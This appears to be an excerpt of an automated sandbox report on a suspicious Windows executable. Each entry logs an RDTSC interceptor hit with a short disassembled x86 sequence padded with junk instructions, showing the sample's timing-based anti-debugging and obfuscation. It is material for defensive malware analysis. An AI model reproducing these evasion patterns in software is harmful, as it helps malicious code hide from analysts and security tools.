Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E2A87F second address: E2A892 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE007Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E37B38 second address: E37B42 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F43C9098CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E3BDB5 second address: E3BDBB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E3BDBB second address: E3BDC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E3BDC5 second address: E3BDCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F43C8AE0076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E3BDCF second address: E3BDD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E3B653 second address: E3B657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E3B657 second address: E3B662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E3B7B4 second address: E3B7C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0080h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E3B917 second address: E3B921 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F43C9098CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E3B921 second address: E3B952 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F43C8AE007Ah 0x00000008 je 00007F43C8AE007Ch 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pushad 0x00000014 popad 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F43C8AE007Dh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E3B952 second address: E3B956 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E3B956 second address: E3B96B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43C8AE007Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E3B96B second address: E3B971 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E40B04 second address: E40B0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E40BD5 second address: E40BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E40D0A second address: E40D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edi 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c pop edi 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jbe 00007F43C8AE0089h 0x00000017 jmp 00007F43C8AE0083h 0x0000001c mov eax, dword ptr [eax] 0x0000001e jp 00007F43C8AE00A7h 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F43C8AE0087h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E459DC second address: E459E6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F43C9098CE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E459E6 second address: E459F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E459F1 second address: E45A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F43C9098CEBh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E45B80 second address: E45B8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E45B8F second address: E45B9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jng 00007F43C9098CE6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E45B9F second address: E45BA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E45CDF second address: E45CFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E46135 second address: E46144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F43C8AE0076h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E46144 second address: E46148 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E462C1 second address: E462D9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F43C8AE0076h 0x00000008 js 00007F43C8AE0076h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jl 00007F43C8AE0082h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E4659F second address: E465A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DC28C0 second address: DC28D1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F43C8AE007Ch 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DC28D1 second address: DC28E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jl 00007F43C9098CE6h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007F43C9098CE6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DC28E9 second address: DC28ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DC28ED second address: DC2903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F43C9098CF2h 0x0000000e jp 00007F43C9098CE6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E5311B second address: E53135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43C8AE007Dh 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b jns 00007F43C8AE0076h 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E532B7 second address: E532BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E532BB second address: E532D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F43C8AE0087h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E53458 second address: E5345E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E5345E second address: E53462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E53462 second address: E534A1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F43C9098CF8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f jnl 00007F43C9098CE6h 0x00000015 jmp 00007F43C9098CEEh 0x0000001a pop ebx 0x0000001b jl 00007F43C9098CE8h 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E53E9C second address: E53EA2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E5A263 second address: E5A269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E5A269 second address: E5A28A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Dh 0x00000007 je 00007F43C8AE0076h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 jp 00007F43C8AE0076h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E5A28A second address: E5A290 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DC9578 second address: DC9580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E58FC3 second address: E58FEC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F43C9098CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F43C9098CF0h 0x00000012 jmp 00007F43C9098CECh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E58FEC second address: E58FF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E58FF4 second address: E58FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E59191 second address: E59196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E59347 second address: E59351 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F43C9098CE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E59351 second address: E59357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E5947B second address: E59480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E59480 second address: E5948A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F43C8AE007Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E5948A second address: E59491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E595F4 second address: E59634 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0088h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007F43C8AE0076h 0x00000010 jmp 00007F43C8AE0085h 0x00000015 push edx 0x00000016 pop edx 0x00000017 popad 0x00000018 pop edi 0x00000019 push ecx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E59634 second address: E5963A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E59A37 second address: E59A3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E59A3B second address: E59A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E106DD second address: E106E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E106E1 second address: E106EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E10902 second address: E10907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E10907 second address: E1090E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E10B8B second address: E10BAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0080h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jno 00007F43C8AE0076h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E10CDB second address: E10CE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E10CE1 second address: E10CE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E10CE7 second address: E10D10 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F43C9098CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 jmp 00007F43C9098CF8h 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E10DC7 second address: E10E18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jno 00007F43C8AE0088h 0x0000000f mov eax, dword ptr [eax] 0x00000011 jnl 00007F43C8AE0095h 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E10E18 second address: E10E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E10E1D second address: E10E22 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E10E22 second address: E10E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F43C9098CE8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 call 00007F43C9098CE9h 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E10E57 second address: E10E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E10E5B second address: E10E61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E10E61 second address: E10E79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE0084h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E10E79 second address: E10E7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E10E7D second address: E10EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F43C8AE0084h 0x0000000f pushad 0x00000010 jnl 00007F43C8AE0076h 0x00000016 jnc 00007F43C8AE0076h 0x0000001c popad 0x0000001d mov eax, dword ptr [esp+04h] 0x00000021 pushad 0x00000022 push esi 0x00000023 jnl 00007F43C8AE0076h 0x00000029 pop esi 0x0000002a push eax 0x0000002b push edx 0x0000002c push edx 0x0000002d pop edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E10EAB second address: E10EC7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F43C9098CF1h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E10EC7 second address: E10EEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F43C8AE007Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E1105F second address: E11068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E112FB second address: E11300 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E11817 second address: E11821 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F43C9098CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E5E39A second address: E5E3A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E5E515 second address: E5E543 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CECh 0x00000007 jg 00007F43C9098CE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jns 00007F43C9098CE6h 0x00000016 jmp 00007F43C9098CEAh 0x0000001b jg 00007F43C9098CE6h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E61CD5 second address: E61CDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E61E9C second address: E61EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E61EA0 second address: E61EB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E62016 second address: E62032 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F43C9098CE6h 0x00000008 jmp 00007F43C9098CF2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E6219C second address: E621BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0089h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E621BB second address: E621D8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F43C9098CE8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F43C9098CECh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E64D2A second address: E64D36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E648DD second address: E648E5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E648E5 second address: E648EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E648EA second address: E64919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jp 00007F43C9098CF2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 jmp 00007F43C9098CF0h 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E6A5D7 second address: E6A5E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F43C8AE0076h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E6A5E3 second address: E6A5F2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F43C9098CE6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E6A5F2 second address: E6A604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43C8AE007Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
